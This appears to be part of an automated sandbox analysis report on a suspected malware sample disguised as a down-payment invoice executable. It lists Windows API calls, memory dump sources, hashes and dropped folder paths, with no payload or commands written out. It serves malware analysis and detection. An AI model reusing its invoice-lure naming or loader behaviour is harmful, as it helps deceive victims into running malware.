                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D01272504420AFC2502738EF0C89FBF95DB543717124B35FAE9A22F0CB304C568A98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                                      • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 6F1D2B33
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6F1D2C3A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocErrorLastVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 497505419-0
                                                                                                                                                                                                                      • Opcode ID: 6562d4b4eb3f9fb734115e2431266edb350bb534ba077ffc85fb41037256f6a9
                                                                                                                                                                                                                      • Instruction ID: d542b9609b24ab2bad97fb26259103353280119900d2d952a924316245bdcfb6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6562d4b4eb3f9fb734115e2431266edb350bb534ba077ffc85fb41037256f6a9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55518F725067849FDB28DFA4D980B993775FB463E8F21442AF824CB680C739B4B1CB91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                                                                                      • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                                                                                                                      • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                      • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
• Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
• Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
• Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0041043A,0040CED0,004033DE,0040CED0,0041043A,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
• Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
• Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
• Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(6F1D405C,00000004,00000040,6F1D404C), ref: 6F1D29B5
Memory Dump Source
• Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
• Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 2ffe1ab299e10fd6536eeb1f3ab410133ac1a55e600d7c338b7d90a8a3289e66
• Instruction ID: e72f658cd08105f0a731a8e8f6b7a576370fcdba5a05f8b4753491c218418a1d
• Opcode Fuzzy Hash: 2ffe1ab299e10fd6536eeb1f3ab410133ac1a55e600d7c338b7d90a8a3289e66
• Instruction Fuzzy Hash: A0F0AEB190AA80DECB50CF6888447863BF0F75A3E4B12852AE2ACD6240E3366068CF51
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
• Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
• Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
• Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
• Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalAlloc.KERNELBASE(00000040,?,6F1D123B,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D1225
Memory Dump Source
• Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,00000403), ref: 004055ED
• GetDlgItem.USER32(?,000003EE), ref: 004055FC
• GetClientRect.USER32(?,?), ref: 00405639
• GetSystemMetrics.USER32(00000002), ref: 00405640
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
• ShowWindow.USER32(?,00000008), ref: 004056DC
• GetDlgItem.USER32(?,000003EC), ref: 004056FD
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
• GetDlgItem.USER32(?,000003F8), ref: 0040560B
  • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
• GetDlgItem.USER32(?,000003EC), ref: 0040574F
• CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
• CloseHandle.KERNEL32(00000000), ref: 00405764
• ShowWindow.USER32(00000000), ref: 00405788
• ShowWindow.USER32(?,00000008), ref: 0040578D
• ShowWindow.USER32(00000008), ref: 004057D7
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
• CreatePopupMenu.USER32 ref: 0040581C
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
• GetWindowRect.USER32(?,?), ref: 00405850
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
• OpenClipboard.USER32(00000000), ref: 004058B1
• EmptyClipboard.USER32 ref: 004058B7
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
• GlobalLock.KERNEL32(00000000), ref: 004058CD
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
• GlobalUnlock.KERNEL32(00000000), ref: 00405901
• SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
• CloseClipboard.USER32 ref: 00405912
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: (7B${
• API String ID: 590372296-525222780
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003FB), ref: 0040489F
• SetWindowTextW.USER32(00000000,?), ref: 004048C9
• SHBrowseForFolderW.SHELL32(?), ref: 0040497A
• CoTaskMemFree.OLE32(00000000), ref: 00404985
• lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
• lstrcatW.KERNEL32(?,Call), ref: 004049C3
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
  • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
  • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
  • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
  • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
  • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
• GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
  • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
  • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
  • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
Strings
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                      • String ID: (7B$A$C:\Users\user\AppData\Local\Admonishment64$Call
                                                                                                                                                                                                                      • API String ID: 2624150263-3624656726
                                                                                                                                                                                                                      • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                                                                                                                      • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
• CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
Strings
• C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences, xrefs: 004021C3
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\Admonishment64\Fremskyndelsen\Superintelligences
• API String ID: 542301482-79196314
• Opcode ID: 4f2286ed38648dcc2c47485c3b8c03fd85972866aeeba554557880fa94d5da5d
• Instruction ID: e2e3704c815c40c35bbcee670b9089186c45407539ca1009a8039cbe375c7a13
• Opcode Fuzzy Hash: 4f2286ed38648dcc2c47485c3b8c03fd85972866aeeba554557880fa94d5da5d
